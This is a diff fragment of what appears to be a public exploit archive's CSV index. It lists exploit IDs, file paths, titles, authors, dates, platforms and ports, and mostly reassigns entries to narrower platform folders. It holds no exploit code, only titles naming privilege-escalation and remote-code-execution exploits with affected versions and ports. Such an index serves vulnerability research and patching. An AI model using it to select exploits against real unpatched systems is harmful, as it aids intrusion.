40049,platforms/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,lin_x86-64,local,0
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
@ -8647,7 +8647,7 @@ id,file,description,date,author,platform,type,port
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
@ -8731,7 +8731,7 @@ id,file,description,date,author,platform,type,port
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
@ -8742,7 +8742,7 @@ id,file,description,date,author,platform,type,port
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40871,platforms/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,lin_x86-64,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
@ -8759,7 +8759,7 @@ id,file,description,date,author,platform,type,port
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
@ -8774,6 +8774,7 @@ id,file,description,date,author,platform,type,port
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8902,7 +8903,7 @@ id,file,description,date,author,platform,type,port
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
@ -8927,7 +8928,7 @@ id,file,description,date,author,platform,type,port
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
346,platforms/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux_sparc,remote,23
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
@ -9165,7 +9166,7 @@ id,file,description,date,author,platform,type,port
1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0
1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
@ -9303,7 +9304,7 @@ id,file,description,date,author,platform,type,port
2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
@ -9419,7 +9420,7 @@ id,file,description,date,author,platform,type,port
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
@ -9972,10 +9973,10 @@ id,file,description,date,author,platform,type,port
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0
8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0
8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0
8623,platforms/windows/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0
8613,platforms/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
8614,platforms/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
8621,platforms/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,win_x86,remote,0
8623,platforms/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,win_x86,remote,0
8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8696,platforms/hardware/remote/8696.txt,"Multiple D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0
@ -10841,7 +10842,7 @@ id,file,description,date,author,platform,type,port
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -10865,12 +10866,12 @@ id,file,description,date,author,platform,type,port
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16738,platforms/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21
16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16743,platforms/win_x86/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203
16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202
16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093
@ -10904,16 +10905,16 @@ id,file,description,date,author,platform,type,port
16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0
16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0
16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
16777,platforms/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144
16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144
16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080
16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
@ -10950,7 +10951,7 @@ id,file,description,date,author,platform,type,port
16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25
16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389
16824,platforms/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389
16825,platforms/windows/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16825,platforms/win_x86/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292
16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -10982,8 +10983,8 @@ id,file,description,date,author,platform,type,port
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0
16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
@ -11002,7 +11003,7 @@ id,file,description,date,author,platform,type,port
16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter - Command Execution (Metasploit) (2)",2010-10-06,Metasploit,irix,remote,0
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
16879,platforms/freebsd/remote/16879.rb,"Xtacacsd 4.1.2 - report() Buffer Overflow (Metasploit) (2)",2010-05-09,Metasploit,freebsd,remote,0
16880,platforms/linux/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,linux,remote,0
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
@ -12360,7 +12361,7 @@ id,file,description,date,author,platform,type,port
21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0
21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0
21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - RPC Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
21765,platforms/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Function Privilege Escalation",2002-08-28,"Noam Rathaus",linux,remote,0
21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0
21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0
21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0
@ -13433,7 +13434,7 @@ id,file,description,date,author,platform,type,port
26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0
26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote,0
40386,platforms/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161
26737,platforms/linux/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0
26737,platforms/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit",2013-07-11,kingcope,lin_x86,remote,0
26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80
26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote,0
26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote,0
@ -13850,7 +13851,7 @@ id,file,description,date,author,platform,type,port
32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
